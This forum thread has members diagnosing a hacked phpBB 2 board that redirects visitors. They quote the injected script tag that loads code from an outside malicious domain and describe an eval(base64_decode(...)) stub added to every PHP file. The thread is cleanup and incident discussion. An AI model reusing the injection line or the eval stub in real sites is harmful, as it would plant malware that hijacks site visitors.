Forum hacked?

[Mayhem]

Pinging up the index.php source in IE8 (yes, it tried to redirect when I used that browser) reveals this at the bottom of the code:

<script src="http://sbulle06tsconti.rr.nu/nl.php?p=d"></script>

Googling that URL pulls up just one hit online for a compromise at Dreamhost:

http://community.mybb.com/thread-114345.html

Which then leads to this thread:

http://discussion.dreamhost.com/thread-134262.html

Is the Usagi Dojo on Dreamhost? If so, it might explain something. The HTACCESS file might need looking at as well.

[Stormhaven]

I ran into something similar a while back on a domain I was running, I'm guessing the PHPBB that the dojoboard is running is probably a few revs behind. There have been quite a few security exploits with the older versions. I had to have the host provider run a grep to find all the files with the domain inserts and manually repair them.

[Todd Shogun]

I use Firefox and no problems....I will see what i can do!

And yes, Dreamhost does host us

[Todd Shogun]

Ugh...it looks messy. This will be time-consuming. Any phpBB-savvy Members out there willing to help?

[maichan]

Wow, sounds serious. Hope you can get it fixed Todd!

@Stormhaven - on your advice I'm on Firefox now without any problems.
My home computer info:
Internet Explorer 9.0.8112.16421 - redirects
Firefox 10.0.2 - Does not redirect

[Stan Sakai]

I heard from Thomas. He has tried getting to the Dojo, but was redirected every time. I gave him the tip about using Firefox. Hopefully, that will work for him.

I've been redirected a couple of times, but not to the extent that others on this board have experienced. I use a Mac computer and Safari.

[Mayhem]

It does appear to be only IE, and perhaps Safari, affected. My brother and I tried different versions of IE and Firefox, and no Firefox version got redirected. All the IE browsers did.

[Stormhaven]

Todd, I don't know PHP but when I had to deal with this, I just manually removed the bits from the HTML. If you just need help doing that, feel free to contact me.

[digulla]

I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.

Edit The virus did two changes:

1. There was a file .log/log1.txt which contains the list of sites to redirect to.

2. At the start of each .php file, there was code like this: <?php /**/ eval(base64_decode("...."))

I'm not sure what this code did, my guess is that it kept the file above up to date plus it probably injected the code for the redirection into the HTML.

I kept the files just in case we want to analyze this further.

[Mayhem]

Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.

[digulla]

Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.

Yes. I just never had the time to make the update.

[digulla]

Here is more info: http://danhilltech.tumblr.com/post/1808 ... -dreamhost

[toine]

I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.

I just have been redirected...

(chrome under ubuntu 11.10)

[go]

Dear Readers,
I just got redirected using Firefox.
Best wishes to all!
go

[Mayhem]

Hmmm, somewhat worrying, but no redirect here for me.